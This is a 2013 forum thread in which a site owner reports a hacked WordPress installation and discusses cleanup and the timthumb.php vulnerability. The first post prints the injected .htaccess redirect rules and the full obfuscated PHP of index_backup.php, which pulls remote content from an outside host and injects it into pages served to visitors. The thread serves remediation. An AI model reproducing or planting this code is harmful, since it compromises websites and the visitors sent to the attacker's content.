Web Tool Bag  
Home · Articles · Downloads · Discussion Forum · Web Links · News Categories · Synonyms DatabaseNovember 19 2017 08:56:31
Navigation
Home
Articles
Downloads
Discussion Forum
Web Links
News Categories
Synonyms Database
Search
Users Online
Guests Online: 1
No Members Online

Registered Members: 856
Unactivated Members: 118
Newest Member: lakim
Forum Threads
Newest Threads
Uncaught Error: _reg...
Module build failed:...
Installation
mochi script questions
Redirect with captch...
Hottest Threads
Installation [12]
Any questions and... [5]
Captcha picture d... [4]
Integrate with Vi... [4]
Mods: Sucess/Than... [4]
 
Latest Articles
PHP Fatal error: Ca...
Mouse pointer disapp...
UBUNTU install via U...
Geany tried to acces...
How to create MySql ...
View Thread
Web Tool Bag | Web security | Wordpress
Author Wordpress infected index_backup.php
admin
Super Administrator



Posts: 33
Location:
Joined: 03.11.09
Posted on 10-06-2013 22:11
Wordpress infected index_backup.php

Hi All,
I have problem with web site based on Wordpress. The site was hacked, in the .htaccess file is added the following code block:

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|
excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|
linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|
amfibi|dmoz|yippy|
walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|
thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|
allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|
bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|
alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|
hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nl
search|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|
alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|
globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|
simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|
apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|
finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|
claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

In almost all directories I found .htaccess file with this code and uploaded somehow file named index_backup.php

The content of index_backup.php file is the following:

<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.
'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),
base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),
base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),
base64_decode(''.'c3V'.'ic3Ry'),
base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),
base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),
base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),
base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),
base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.
'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),
base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),
base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.
'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),
base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),
base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==',
'aH'.'R0c'.'DovL3d'.'vcmRwcmV'.
'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==',
'R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.
'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.
'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.
'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.
'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.
'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.
'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.
'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@
$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=>
round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333)
,round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 .
_1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round
(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=
$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round
(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);
$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));
if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&&
$GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>
round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS
['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round
(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]
($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2)
{if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0
($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round
(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif
(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}


The php code is encoded and it is hard to read the implemented functionality. If you have some suggestions, fix and prevent of future infection, please share this information. I hope this web virus problem will be resolved soon. If I find some solution I will write you about the infection fix.


Cheers

Edited by admin on 13-06-2013 09:10
Author RE: How to clean this infection
admin
Super Administrator



Posts: 33
Location:
Joined: 03.11.09
Posted on 10-06-2013 22:39
1. Get your latest clean backup.
2. Download all files from your Wordpress installation.
Do diff of the both directories clean and infected. For diff you can use
Beyondcompare for windows or meld for Linux. Delete all new files from
infected directory clean .htaccess file. That is all.
3. Now the question is how to prevent new infection of the site from the same virus.


Please write your suggestions.
Author RE: Wordpress infected index_backup.php
admin
Super Administrator



Posts: 33
Location:
Joined: 03.11.09
Posted on 13-06-2013 09:14
It seems the infection attack comes from file "thumb.php" in themes folder, there you can find fopen function with write ("w") parameter.

"Look for a file in your WordPress theme’s folder called timthumb.php. If it’s there, you need to fix it."

Here is the fix of the vulnerability:

How to Replace timthumb.php in Your WordPress Theme

The easiest, safest and fastest way to eliminate this vulnerability to your website without risking breaking other functions is to follow the instructions I outlined in the video clip:

http://www.epiphanymarketing.com/blog/2011/08/18/timthumb-wordpress-how-to-fix-the-timthumb-php-vulnerability-in-your-wordpress-theme/

The version of of thumb.php file on my infected installation was define ('VERSION', '2.8.10');
I have updated it to define ('VERSION', '2.8.11');
For now I don't have problems.

Please, write in this thread if you find other solution.

Edited by admin on 13-06-2013 09:21
Login
Username

Password



Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.
Member Poll
Which PHP framework do you preffer?

Symfony

Zend

CodeIgniter

PHP on TRAX

eZ Components

Fusebox

PhpOpenbiz

Prado

QPHP

Seagull

You must login to vote.
Shoutbox
You must login to post a message.

Vince
03/10/2011 21:17
Hi, How to remove Register from Login screen? I don't want them to register and have full access! if you leave register then they should not have any rights until the admin assigns them

webtoolz
26/09/2011 11:28
Please describe your problem with more details. Thank you.

bimmer98
22/11/2010 20:31
Help. There was a problem with the request; error regarding feedbackzdr form program

Copyright © 2017 - www.webtoolbag.com